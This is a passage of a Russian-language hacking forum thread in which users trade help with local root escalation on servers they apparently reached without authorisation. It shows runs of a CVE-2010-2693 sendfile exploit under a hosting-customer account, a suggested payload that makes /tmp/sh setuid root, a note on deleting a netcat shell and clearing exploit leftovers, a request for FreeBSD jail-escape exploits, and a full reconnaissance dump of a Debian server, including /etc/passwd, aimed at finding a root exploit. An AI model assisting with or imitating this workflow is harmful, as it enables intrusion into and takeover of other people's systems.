Старый 28.07.2012, 02:18   #491
bamboo
 
Регистрация: 23.07.2012
Сообщений: 3
Репутация: 0
По умолчанию

Ничего не изменилось.

Код:
$ id
uid=1125(neodent39) gid=1126(neodent39) groups=1126(neodent39),1008(customers)
$ gcc cve-2010-2693.c -o cve-2010-2693 -lpthread

$ ./cve-2010-2693
uid=1125(neodent39) gid=1126(neodent39) groups=1126(neodent39),1008(customers)
[+] checking for setuid /usr/bin/su binary...
[+] checking for suitable libc library in /lib...
[+] found libc at /lib/libc.so.7
[+] found getuid function at 0x00054290
[+] target: 0x00054290, adjusted: 0x00053a90, writes: 1338
[+] spawning listener thread...
[+] connecting to listener thread...
[+] initiating exploit via sendfile...
[+] exploit complete!
[+] spawning root shell...
$ id
uid=1125(neodent39) gid=1126(neodent39) groups=1126(neodent39),1008(customers)
bamboo вне форума   Ответить с цитированием
Старый 28.07.2012, 02:51   #492
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

Как я понял после spawning root shell... вывода не было, ты сам чекнул id? Если да, то перед запуском сделай cp /bin/sh /tmp/sh а в system :
Цитата:
system("chown root:wheel /tmp/sh; chmod 4755 /tmp/sh;");
ну или просто "id > id.txt" Похоже что сплоент отрабатывает но спавнится su в другом процессе что ле.
b3 вне форума   Ответить с цитированием
Старый 28.07.2012, 03:20   #493
bamboo
 
Регистрация: 23.07.2012
Сообщений: 3
Репутация: 0
Talking

Цитата:
Как я понял после spawning root shell... вывода не было, ты сам чекнул id?
Да.

Цитата:
Если да, то перед запуском сделай cp /bin/sh /tmp/sh а в system :
Цитата:
system("chown root:wheel /tmp/sh; chmod 4755 /tmp/sh;");
ну или просто "id > id.txt" Похоже что сплоент отрабатывает но спавнится su в другом процессе что ле.
В консоли шелла ничего нового не выводится несмотря на эти команды.

Зато если запустить скрипт в консольке нетката то получится следущее:

Твоя версия скрипта с system("chown root:wheel /tmp/sh; chmod 4755 /tmp/sh;");
Код:
$ gcc cve-2010-2693.c -o cve-2010-2693 -lpthread
$ cp /bin/sh /tmp/sh
$ ./cve-2010-2693
chown: /tmp/sh: Operation not permitted
[+] checking for setuid /usr/bin/su binary...
[+] checking for suitable libc library in /lib...
[+] found libc at /lib/libc.so.7
[+] found getuid function at 0x00054290
[+] target: 0x00054290, adjusted: 0x00053a90, writes: 1338
[+] spawning listener thread...
[+] connecting to listener thread...
[+] initiating exploit via sendfile...
[+] exploit complete!
[+] spawning root shell...
Оригинальная версия сплойта:
Код:
$ gcc cve-2010-2693.c -o cve-2010-2693 -lpthread
$ cp /bin/sh /tmp/sh
$ ./cve-2010-2693
su: Sorry
[+] checking for setuid /usr/bin/su binary...
[+] checking for suitable libc library in /lib...
[+] found libc at /lib/libc.so.7
[+] found getuid function at 0x00054290
[+] target: 0x00054290, adjusted: 0x00053a90, writes: 1338
[+] spawning listener thread...
[+] connecting to listener thread...
[+] initiating exploit via sendfile...
[+] exploit complete!
[+] spawning root shell...
Такие дела.

Между тем, пока я писал этот пост случилось это: http://s61.radikal.ru/i173/1207/bc/c77f8ff34138.png
Я удалил шелл и эксплойт через неткат, от греха подальше.
bamboo вне форума   Ответить с цитированием
Старый 28.07.2012, 03:28   #494
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

Цитата:
В консоли шелла ничего нового не выводится несмотря на эти команды.
лол) в конфоле и не должно было ничего выводить, там должен суидный бит повестится на /tmp/sh и овнер на рута измениться. Ну как я понял уже поздно проверять ls -lha /tmp/sh
b3 вне форума   Ответить с цитированием
Старый 04.08.2012, 11:01   #495
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Заметка: не стоит забывать убивать остатки эксплойтов в процессах.
Untitled вне форума   Ответить с цитированием
Старый 11.08.2012, 14:25   #496
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

Есть ли какие сплоиты на выход из jail для freebsd 9 ,прова рут.
euro вне форума   Ответить с цитированием
Старый 11.08.2012, 14:56   #497
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

По-моему, в паблике нет эксплойтов, которые вылазят из джейла.

PS Подойдет любой рабочий эксплойт ядра, только чтобы вылезти из джейла надо разбираться и писать свой payload.
SynQ вне форума   Ответить с цитированием
Старый 12.08.2012, 20:35   #498
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Cдаюсь.

1. uname -a

Код:
Linux 2.6.27.52-imu-x86 #1 SMP Mon Aug 23 11:13:12 CEST 2010 i686 GNU/Linux
2. mount

Код:
/dev/sda2 on / type xfs (rw)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/sda1 on /dell type vfat (ro)
/dev/sda5 on /var type xfs (rw,nosuid)
/dev/sda6 on /tmp type xfs (rw,nosuid)
/dev/sda7 on /home type xfs (rw,noatime,usrquota,grpquota)
/home/mysql on /opt/mysql/data type none (rw,bind)
/home/log/mysql on /opt/mysql/log type none (rw,bind)
3. df -h

Код:
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda2             3.9G  1.4G  2.6G  36% /
tmpfs                 8.0G     0  8.0G   0% /lib/init/rw
udev                   10M  2.8M  7.3M  28% /dev
tmpfs                 8.0G     0  8.0G   0% /dev/shm
/dev/sda1              40M  4.9M   35M  13% /dell
/dev/sda5             2.0G  1.1G  921M  54% /var
/dev/sda6             2.0G  4.8M  2.0G   1% /tmp
/dev/sda7             672G  296G  376G  45% /home
4. ls -la /boot

Код:
total 10784
drwxr-xr-x   3 root root    4096 Sep  1  2011 .
drwxr-sr-x+ 22 root root    4096 Jun 20  2011 ..
-rw-r--r--   1 root root 1521001 Aug 23  2010 System.map-2.6.27.52-imu-x86
-rw-r--r--   1 root root 1754288 Mar  4  2011 System.map-2.6.35.11-imu-x86
lrwxrwxrwx   1 root root       1 Mar 25  2010 boot -> .
-rw-r--r--   1 root root    7988 Apr 13  2002 boot-bmp.b
-rw-r--r--   1 root root    6204 Apr 13  2002 boot-compat.b
-rw-r--r--   1 root root    7964 Apr 13  2002 boot-menu.b
-rw-r--r--   1 root root    6204 Apr 13  2002 boot-text.b
lrwxrwxrwx   1 root root      11 Mar 25  2010 boot.b -> boot-menu.b
-rw-r--r--   1 root root     728 Apr 13  2002 chain.b
-rw-r--r--   1 root root   58315 Aug 23  2010 config-2.6.27.52-imu-x86
-rw-r--r--   1 root root   71612 Mar  4  2011 config-2.6.35.11-imu-x86
drwxr-xr-x   2 root root    4096 Feb 21 14:27 grub
-rw-r--r--   1 root root     656 Apr 13  2002 os2_d.b
lrwxrwxrwx   1 root root      25 Sep  1  2011 vmlinuz -> vmlinuz-2.6.27.52-imu-x86
-rw-r--r--   1 root root 3539792 Aug 23  2010 vmlinuz-2.6.27.52-imu-x86
-rw-r--r--   1 root root 4027552 Mar  4  2011 vmlinuz-2.6.35.11-imu-x86
lrwxrwxrwx   1 root root      25 Mar 29  2011 vmlinuz.old -> vmlinuz-2.6.35.11-imu-x86
5. cat /proc/version

Код:
Linux version 2.6.27.52-imu-x86 (root@test8-3) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Mon Aug 23 11:13:12 CEST 2010
6. cat /etc/passwd

Код:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
Debian-exim:x:103:103::/var/spool/exim4:/bin/false
snmp:x:101:65534::/var/lib/snmp:/bin/false
libuuid:x:104:104::/var/lib/libuuid:/bin/sh
smmsp:x:81:81::/var/spool/clientmqueue:/bin/false
mysql:x:90:90:MySQL server:/opt/mysql:/bin/bash
httpd:x:80:80::/opt/apache:/bin/sh
<...>
7. cat /etc/issue

Код:
Debian GNU/Linux 5.0 \n \l
8. cat /etc/issue.net

Код:
Debian GNU/Linux 5.0
9. cat /proc/sys/vm/mmap_min_addr

Код:
4096
10. ls -la /etc

Код:
total 1116
drwxr-xr-x+ 74 root   root        8192 Aug 12 19:26 .
drwxr-sr-x+ 22 root   root        4096 Jun 20  2011 ..
-r--------   1 root   root           9 Feb  9  2011 .clamav.pwd
-rw-------   1 root   root           0 Jan 14  2004 .pwd.lock
-rw-r--r--   1 root   root        3244 Nov  7  2001 .serial.conf.old
-r--------   1 root   root          10 Feb  9  2011 .uploadclamav.pwd
drwxr-xr-x   5 root   root         126 Mar 25  2010 X11
-rw-r--r--   1 root   root        2091 Jan 14  2004 adduser.conf
-rw-r--r--   1 root   root          44 Aug 12 19:17 adjtime
-rw-r--r--   1 root   root         198 Apr 20  2010 aliases
drwxr-xr-x   2 root   root        4096 Jan 10  2012 alternatives
-rw-r--r--   1 root   root         112 Feb 27  2005 apg.conf
drwxr-xr-x   3 root   root          20 Jan 14  2004 apm
drwxr-xr-x   4 root   root         136 Sep 20  2010 apt
-rw-r-----   1 root   daemon       144 Jan  3  2006 at.deny
drwxr-s---   2 root   site1000      73 Aug  3 10:12 banip
-rw-r--r--   1 root   root        1453 May 12  2008 bash.bashrc
-rw-r--r--   1 root   root      215907 Dec 11  2006 bash_completion
drwxr-xr-x   2 root   root          20 May  7  2009 bash_completion.d
-rw-r--r--   1 root   root         332 Jan  4  2009 bindresvport.blacklist
drwxr-xr-x   3 root   root          21 May  7  2009 ca-certificates
-rw-r--r--   1 root   root        6573 May  7  2009 ca-certificates.conf
-rw-r--r--   1 root   root        4867 May 24  2007 ca-certificates.conf.dpkg-old
drwxr-xr-x   2 root   root          20 May  7  2009 calendar
drwxr-s---   2 root   dip           21 Jan 14  2004 chatscripts
-rw-r--r--   1 root   root        3956 Oct  1  2001 checksecurity.conf
drwxr-xr-x   3 root   root          68 Feb  9  2011 clamav
drwxr-xr-x   2 root   root          29 Sep 24  2004 console
drwxr-xr-x   2 root   root          31 May  7  2009 console-tools
-r--------   1 root   root          11 Feb 15  2005 cron.allow
drwxr-xr-x   2 root   root         113 Apr 10 14:54 cron.d
drwxr-xr-x   2 root   root        4096 May  8 10:23 cron.daily
drwxr-xr-x   2 root   root          65 Jun 16  2011 cron.hourly
drwxr-xr-x   2 root   root          72 Mar 25  2010 cron.monthly
drwxr-xr-x   2 root   root          70 Jan 24  2011 cron.weekly
-rw-r--r--   1 root   root        1296 Oct 27  2011 crontab
-rw-r--r--   1 root   root         709 Sep 20  2005 crontab.dpkg-old
drwxr-xr-x   2 root   root           6 Mar  2  2010 cups
-rw-r--r--   1 root   root        2969 Oct 12  2008 debconf.conf
-rw-r--r--   1 root   root           6 Jan 16  2011 debian_version
drwxr-xr-x   2 root   root        4096 Sep  1  2011 default
drwxr-xr-x   4 root   root         149 Mar 25  2010 defoma
-rw-r--r--   1 root   root         600 Jan 19  2007 deluser.conf
-rwxr-xr-x   1 root   root        6206 Nov 11  2004 dhclient-script
-rw-r--r--   1 root   root        1518 Mar 17  2002 dhclient.conf
drwxr-xr-x   4 root   root        4096 Mar 25  2010 dhcp3
drwxr-xr-x   2 root   root           6 Aug  6  2008 dictionaries-common
drwxr-xr-x   3 root   root          96 Jan 24  2011 dpkg
drwxr-xr-x   3 root   root          25 Mar 25  2010 emacs
-rw-r--r--   1 root   root           0 Apr 25  2007 environment
-rw-r--r--   1 root   root         389 Oct 20  2008 exports.ucf-dist
-rw-r--r--   1 root   root         354 Jan 23  2002 fdmount.conf
drwxr-xr-x   4 root   root          69 Mar 25  2010 fonts
drwxr-xr-x   2 root   root          25 Mar 25  2010 freetds
-rw-r--r--   1 root   root         597 Mar 25  2010 fstab
-rw-r--r--   1 root   root        2689 Jan  4  2009 gai.conf
-rw-r--r--   1 root   root          97 Nov 18  2001 gateways
drwxr-xr-x   2 root   root          39 May  7  2009 groff
-rw-r--r--   1 root   root       13157 Aug 12 11:53 group
-rw-r--r--   1 root   root         428 Jan 14  2004 group.org
-rw-r--r--   1 root   root       14032 Aug 10 10:12 gshadow
-rw-r--r--   1 root   root         899 Apr 19  2008 gssapi_mech.conf
-rw-r--r--   1 root   root        4793 Oct 25  2006 hdparm.conf
-rw-r--r--   1 root   root           9 Aug  7  2006 host.conf
-rw-r--r--   1 root   root           7 Dec 21  2006 hostname
-rw-r--r--   1 root   root          62 Dec 21  2006 hosts
-rw-r--r--   1 root   root         892 Sep 27  2010 hosts.allow
-rw-r--r--   1 root   root         898 May 19  2004 hosts.deny
-rw-r--r--   1 root   root         145 Oct 20  2008 idmapd.conf
-rw-r--r--   1 root   root         173 Feb 21 14:27 iftab
-rw-r--r--   1 root   root        1327 Dec 15  2010 inetd.conf
drwxr-xr-x   2 root   root        4096 Dec  6  2011 init.d
-rw-r--r--   1 root   root        2160 Feb 21 14:27 inittab
-rw-r--r--   1 root   root         559 Sep 27  2005 inittab.rej
-rw-r--r--   1 root   root         422 Aug 22  2001 inputrc
drwxr-xr-x   2 root   root         104 May  7  2009 iproute2
-rw-r--r--   1 root   root          28 Apr 11  2009 issue
-rw-r--r--   1 root   root           0 Sep 20  2005 issue.dpkg-old
-rw-r--r--   1 root   root          21 Apr 11  2009 issue.net
-rw-r--r--   1 root   root           0 Sep 20  2005 issue.net.dpkg-old
-rw-r--r--   1 root   root         166 Sep  1  2011 kernel-img.conf
-rw-r--r--   1 root   root       27356 Oct 17  2011 ld.so.cache
-rw-r--r--   1 root   root         218 Mar 22  2011 ld.so.conf
drwxr-xr-x   2 root   root          48 Jan 24  2011 ld.so.conf.d
drwxr-xr-x   2 root   root          96 Sep 21  2010 ldap
-rw-r--r--   1 root   root        3578 Jun 15  2008 lftp.conf
drwxr-xr-x   2 root   root           6 Jun 17  2008 libpaper.d
-rw-r--r--   1 root   root        2586 Jan  4  2009 locale.alias
-rw-r--r--   1 root   root        2539 May 10  2005 locale.alias.dpkg-old
-rw-r--r--   1 root   root        8459 Nov 29  2011 locale.gen
-rw-r--r--   1 root   root        1892 Jan 24  2011 localtime
drwxr-xr-x   5 root   root          78 Apr 20  2010 logcheck
-rw-r--r--   1 root   root       10879 Nov 22  2008 login.defs
-rw-r--r--   1 root   root         599 Jun  3  2006 logrotate.conf
drwxr-xr-x   2 root   root        4096 Apr 10 14:54 logrotate.d
drwxr-xr-x   2 root   root           6 Mar  6  2007 lsb-base
-rw-r--r--   1 root   root       13144 Jan 28  2008 ltrace.conf
drwxr-xr-x   2 root   root          52 May  7  2009 lynx-cur
-rw-r--r--   1 root   root         884 Mar 25  2010 magic
-rw-r--r--   1 root   root       31231 Jan 25  2011 magic.mime
drwxr-sr-x   2 root   root        4096 Mar 25  2010 mail
-rw-r--r--   1 root   root         125 Apr  4  2001 mail.rc
-rw-r--r--   1 root   root        2132 Sep 20  2010 mailcap
-rw-r--r--   1 root   root         449 Jun 18  2008 mailcap.order
-rw-r--r--   1 root   root          19 May  7  2009 mailname
-rw-r--r--   1 root   root        4630 Jan 24  2009 manpath.config
-rw-r--r--   1 root   root       11742 Jun 19  2004 mediaprm
-rw-r--r--   1 root   root       21373 Jun 18  2008 mime.types
drwxr-xr-x   2 root   root          61 May  7  2009 minicom
-rw-r--r--   1 root   root         803 Oct 13  2008 mke2fs.conf
drwxr-xr-x   3 root   root          54 May 24  2007 mkinitrd
drwxr-xr-x   3 root   root         141 Apr 24 09:42 modprobe.d
-rw-r--r--   1 root   root         296 Jun 21  2010 modules
-rw-r--r--   1 root   root        7082 May  7  2009 modules.conf
-rw-r--r--   1 root   root        7082 May  7  2009 modules.conf.old
drwxr-xr-x   3 root   root          95 May  7  2009 modutils
lrwxrwxrwx   1 root   root          13 Mar 25  2010 motd -> /var/run/motd
-rw-r--r--   1 root   root         570 Aug 12 19:26 mtab
drwxr-xr-x   3 root   root          54 Jan 24  2011 mysql
-rw-r--r--   1 root   root        7672 Dec 22  2006 nanorc
drwxr-xr-x   6 root   root         156 Sep  1  2011 network
-rw-r--r--   1 root   root          60 May 24  2007 networks
-rw-r--r--   1 root   root        2272 Feb 25  2011 nscd.conf
-rw-r--r--   1 root   root         465 Mar 11  1999 nsswitch.conf
-rw-r--r--   1 root   root         259 Mar 25  2010 omreg.cfg
drwxr-xr-x   2 root   root          52 Mar 25  2010 openoffice
drwxr-xr-x   2 root   root           6 Jan 14  2004 opt
-rw-r--r--   1 root   root         552 Jul 31  2004 pam.conf
drwxr-xr-x   2 root   root        4096 May 29 14:30 pam.d
-rw-r--r--   1 root   root           3 Mar 25  2010 papersize
-rw-r--r--   1 root   root       66702 Aug 12 11:53 passwd
-rw-r--r--   1 root   root         824 Jan 14  2004 passwd.org
drwxr-xr-x   3 root   root        4096 Jan 14  2004 pcmcia
drwxr-xr-x   5 root   root          37 Mar 25  2010 perl
drwxr-xr-x   6 root   root        4096 Jan 14  2004 ppp
-rw-r--r--   1 root   root         364 Mar 25  2010 profile
-rw-r--r--   1 root   root         295 Mar 25  2010 profile.sysenv
-rw-r--r--   1 root   root        2626 Aug 28  2008 protocols
drwxr-xr-x   2 root   root          26 Mar 25  2010 python
drwxr-xr-x   2 root   root          29 Mar 25  2010 python2.5
drwxrwxr-x   2 quagga quaggavty    114 Jun 21 14:01 quagga
-rw-r--r--   1 root   root         220 May 11  2005 quotagrpadmins
-rw-r--r--   1 root   root         526 Mar  7  2002 quotatab
-rwxr-xr-x   1 root   root         306 May 24  2007 rc.local
drwxr-xr-x   2 root   root        4096 Jul  4  2011 rc0.d
drwxr-xr-x   2 root   root        4096 Jul  4  2011 rc1.d
drwxr-xr-x   2 root   root        4096 Jul  4  2011 rc2.d
drwxr-xr-x   2 root   root        4096 Jul  4  2011 rc3.d
drwxr-xr-x   2 root   root        4096 Jul  4  2011 rc4.d
drwxr-xr-x   2 root   root        4096 Jul  4  2011 rc5.d
drwxr-xr-x   2 root   root        4096 Jul  4  2011 rc6.d
drwxr-xr-x   2 root   root        4096 Mar 25  2010 rcS.d
-rw-r--r--   1 root   root          88 Feb 25  2011 resolv.conf
-rwxr-xr-x   1 root   root         268 Feb  1  2002 rmt
-rw-r--r--   1 root   root         887 Mar 21  2005 rpc
-rw-r--r--   1 root   root         369 May 12  2010 rsyncd.conf
-rw-------   1 root   root          16 Mar 25  2010 rsyncd.secrets
drwxr-xr-x   2 root   root          36 Aug 23  2006 sassnmp
-rw-r--r--   1 root   root        3663 Jun 12  2008 screenrc
-rw-r--r--   1 root   root         666 Mar 24  2007 scsi_id.config
-rw-r--r--   1 root   root        1287 Nov 22  2008 securetty
-rw-r--r--   1 root   root         323 Jan 14  2004 securetty.dpkg-old
drwxr-xr-x   2 root   root        4096 May  7  2009 security
-rw-r--r--   1 root   root       85602 Jul  3  2008 sensors.conf
-r--------   1 root   root           8 Mar 25  2010 serial_number
-r--------   1 root   root           8 Mar 25  2010 serialnumber
-rw-r--r--   1 root   root       18480 Aug 28  2008 services
-rw-------   1 root   root       36036 Aug 12 11:53 shadow
-rw-r-----   1 root   shadow       594 Jan 14  2004 shadow.org
-rw-r--r--   1 root   root         233 Mar 25  2010 shells
drwxr-xr-x   2 root   root          54 May  7  2009 skel
drwxr-xr-x   2 root   root          44 Jun 25 11:00 snmp
drwxr-xr-x   2 root   root        4096 Mar 25  2010 ssh
drwxr-xr-x   4 root   root          50 Jan 24  2011 ssl
-rw-r--r--   1 root   root        3122 Apr 10 14:54 sysctl.conf
-rw-r--r--   1 root   root        2275 Jan 11  2009 sysctl.conf.dpkg-dist
drwxr-xr-x   2 root   root           6 Jan 11  2009 sysctl.d
-rw-r--r--   1 root   root        1710 Mar 25  2010 syslog.conf
-rw-r--r--   1 root   root        1614 Jun 20  2008 syslog.conf.dpkg-dist
drwxr-xr-x   2 root   root          64 May  7  2009 sysstat
-r--------   1 root   root          14 Jan 12  2006 system_type
drwxr-xr-x   2 root   root          19 May  7  2009 terminfo
-rw-r--r--   1 root   root          14 Jan 24  2011 timezone
-rw-r--r--   1 root   root        1260 Feb 25  2007 ucf.conf
drwxr-xr-x   4 root   root          83 Mar 25  2010 udev
-rw-r--r--   1 root   root        1823 Sep 22  2008 ulogd.conf
drwxr-xr-x   2 root   root          31 May  7  2009 vim
-rw-r--r--   1 root   root         314 Sep 29  2008 warnquota.conf
-rw-r--r--   1 root   root        4221 Jun 28  2006 wgetrc
drwxr-xr-x   2 root   root        4096 Jan 24  2011 xpdf
11. ls -la --full-time /lib

Код:
total 8040
drwxr-xr-x  12 root root    8192 2011-01-24 11:26:00.683244818 +0100 .
drwxr-sr-x+ 22 root root    4096 2011-06-20 15:14:18.386318473 +0200 ..
drwxr-xr-x   4 root root      48 2011-09-01 15:38:37.699995000 +0200 firmware
drwxr-xr-x   3 root root      20 2004-11-24 21:04:57.000000000 +0100 grub
drwxr-xr-x   2 root root       6 2007-02-21 16:00:42.000000000 +0100 i486-linux-gnu
drwxr-xr-x   3 root root     116 2009-05-07 16:40:53.000000000 +0200 init
-rwxr-xr-x   1 root root  113248 2011-01-08 07:59:32.000000000 +0100 ld-2.7.so
lrwxrwxrwx   1 root root       9 2011-01-24 11:26:00.623163088 +0100 ld-linux.so.2 -> ld-2.7.so
-rw-r--r--   1 root root    5436 2011-01-08 07:59:33.000000000 +0100 libBrokenLocale-2.7.so
lrwxrwxrwx   1 root root      22 2011-01-24 11:26:00.623163088 +0100 libBrokenLocale.so.1 -> libBrokenLocale-2.7.so
-rw-r--r--   1 root root   13692 2011-01-08 07:59:32.000000000 +0100 libSegFault.so
lrwxrwxrwx   1 root root      15 2010-03-25 09:02:51.835584311 +0100 libacl.so.1 -> libacl.so.1.1.0
-rw-r--r--   1 root root   24800 2008-04-23 23:22:04.000000000 +0200 libacl.so.1.1.0
-rw-r--r--   1 root root    9800 2011-01-08 07:59:32.000000000 +0100 libanl-2.7.so
lrwxrwxrwx   1 root root      13 2011-01-24 11:26:00.623163088 +0100 libanl.so.1 -> libanl-2.7.so
lrwxrwxrwx   1 root root      15 2010-03-25 09:02:51.784949687 +0100 libatm.so.1 -> libatm.so.1.0.0
-rw-r--r--   1 root root   31316 2008-03-31 00:12:14.000000000 +0200 libatm.so.1.0.0
lrwxrwxrwx   1 root root      16 2010-03-25 09:02:52.311011052 +0100 libattr.so.1 -> libattr.so.1.1.0
-rw-r--r--   1 root root   14744 2009-02-10 11:52:07.000000000 +0100 libattr.so.1.1.0
lrwxrwxrwx   1 root root      15 2010-03-25 09:02:52.057998292 +0100 libblkid.so.1 -> libblkid.so.1.0
-rw-r--r--   1 root root   38020 2008-10-13 05:33:35.000000000 +0200 libblkid.so.1.0
lrwxrwxrwx   1 root root      15 2010-09-21 07:53:47.549918691 +0200 libbz2.so.1 -> libbz2.so.1.0.4
lrwxrwxrwx   1 root root      15 2010-09-21 07:53:47.549918691 +0200 libbz2.so.1.0 -> libbz2.so.1.0.4
-rw-r--r--   1 root root   66276 2010-08-18 19:15:26.000000000 +0200 libbz2.so.1.0.4
-rwxr-xr-x   1 root root 1294572 2011-01-08 07:59:32.000000000 +0100 libc-2.7.so
lrwxrwxrwx   1 root root      11 2011-01-24 11:26:00.623163088 +0100 libc.so.6 -> libc-2.7.so
lrwxrwxrwx   1 root root      14 2010-03-25 09:02:51.784949687 +0100 libcap.so.1 -> libcap.so.1.10
-rw-r--r--   1 root root   11024 2004-04-14 00:10:45.000000000 +0200 libcap.so.1.10
lrwxrwxrwx   1 root root      14 2010-03-25 09:02:51.784949687 +0100 libcap.so.2 -> libcap.so.2.11
-rw-r--r--   1 root root   13364 2008-07-26 17:26:50.000000000 +0200 libcap.so.2.11
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:52.068121479 +0100 libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r--   1 root root   10712 2008-04-15 23:18:10.000000000 +0200 libcfont.so.0.0.0
-rw-r--r--   1 root root  185816 2011-01-08 07:59:32.000000000 +0100 libcidn-2.7.so
lrwxrwxrwx   1 root root      14 2011-01-24 11:26:00.623163088 +0100 libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:51.835584311 +0100 libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r--   1 root root    8676 2008-10-13 05:33:34.000000000 +0200 libcom_err.so.2.1
lrwxrwxrwx   1 root root      19 2010-03-25 09:02:51.784949687 +0100 libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r--   1 root root   72816 2008-04-15 23:18:10.000000000 +0200 libconsole.so.0.0.0
-rw-r--r--   1 root root   38296 2011-01-08 07:59:32.000000000 +0100 libcrypt-2.7.so
lrwxrwxrwx   1 root root      15 2011-01-24 11:26:00.623163088 +0100 libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx   1 root root      19 2010-03-25 09:02:51.784949687 +0100 libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r--   1 root root   17024 2008-04-15 23:18:10.000000000 +0200 libctutils.so.0.0.0
lrwxrwxrwx   1 root root      15 2010-03-25 09:02:51.784949687 +0100 libdb.so.2 -> libdb1-2.2.5.so
-rw-r--r--   1 root root  260828 2004-06-10 17:27:14.000000000 +0200 libdb.so.3
-rw-r--r--   1 root root   55052 2006-02-14 23:06:32.000000000 +0100 libdb1-2.2.5.so
lrwxrwxrwx   1 root root      15 2010-03-25 09:02:52.088359611 +0100 libdb1.so.2 -> libdb1-2.2.5.so
lrwxrwxrwx   1 root root      15 2010-03-25 09:02:51.784949687 +0100 libdb2.so.2 -> libdb2.so.2.7.7
-rw-r--r--   1 root root  291624 2004-06-10 17:27:14.000000000 +0200 libdb2.so.2.7.7
-rw-r--r--   1 root root   65332 2006-08-09 00:39:02.000000000 +0200 libdevmapper.so.1.02
-rw-r--r--   1 root root   93052 2008-10-01 19:05:55.000000000 +0200 libdevmapper.so.1.02.1
-rw-r--r--   1 root root    9680 2011-01-08 07:59:32.000000000 +0100 libdl-2.7.so
lrwxrwxrwx   1 root root      12 2011-01-24 11:26:00.623163088 +0100 libdl.so.2 -> libdl-2.7.so
lrwxrwxrwx   1 root root      14 2010-03-25 09:02:52.098494774 +0100 libdm.so.0 -> libdm.so.0.0.4
-rw-r--r--   1 root root   13724 2002-04-15 03:06:49.000000000 +0200 libdm.so.0.0.2
-rw-r--r--   1 root root   18896 2007-05-28 08:20:59.000000000 +0200 libdm.so.0.0.4
lrwxrwxrwx   1 root root      13 2010-03-25 09:02:52.078244589 +0100 libe2p.so.2 -> libe2p.so.2.3
-rw-r--r--   1 root root   22912 2008-10-13 05:33:35.000000000 +0200 libe2p.so.2.3
lrwxrwxrwx   1 root root      16 2010-03-25 09:02:52.290772569 +0100 libext2fs.so.2 -> libext2fs.so.2.4
-rw-r--r--   1 root root  167900 2008-10-13 05:33:35.000000000 +0200 libext2fs.so.2.4
-rw-r--r--   1 root root   49676 2008-12-31 13:50:19.000000000 +0100 libgcc_s.so.1
lrwxrwxrwx   1 root root      18 2010-03-25 09:02:52.098494774 +0100 libhandle.so.1 -> libhandle.so.1.0.3
-rw-r--r--   1 root root    7208 2009-02-10 09:39:35.000000000 +0100 libhandle.so.1.0.3
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:51.825455622 +0100 libhistory.so.4 -> libhistory.so.4.3
-rw-r--r--   1 root root   23872 2004-06-13 21:02:12.000000000 +0200 libhistory.so.4.3
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:52.088359611 +0100 libhistory.so.5 -> libhistory.so.5.2
-rw-r--r--   1 root root   28032 2009-01-20 16:07:11.000000000 +0100 libhistory.so.5.2
-rw-r--r--   1 root root   27268 2008-07-24 15:08:34.000000000 +0200 libiw.so.29
-rw-r--r--   1 root root    5744 2008-09-01 13:01:21.000000000 +0200 libkeyutils-1.2.so
lrwxrwxrwx   1 root root      18 2010-03-25 09:02:51.835584311 +0100 libkeyutils.so.1 -> libkeyutils-1.2.so
-rw-r--r--   1 root root  149328 2011-01-08 07:59:32.000000000 +0100 libm-2.7.so
lrwxrwxrwx   1 root root      11 2011-01-24 11:26:00.623163088 +0100 libm.so.6 -> libm-2.7.so
-rw-r--r--   1 root root   13692 2011-01-08 07:59:32.000000000 +0100 libmemusage.so
lrwxrwxrwx   1 root root      17 2010-03-25 09:02:52.078244589 +0100 libncurses.so.5 -> libncurses.so.5.7
-rw-r--r--   1 root root  202188 2008-12-14 21:27:28.000000000 +0100 libncurses.so.5.7
lrwxrwxrwx   1 root root      18 2010-03-25 09:02:51.855758859 +0100 libncursesw.so.5 -> libncursesw.so.5.7
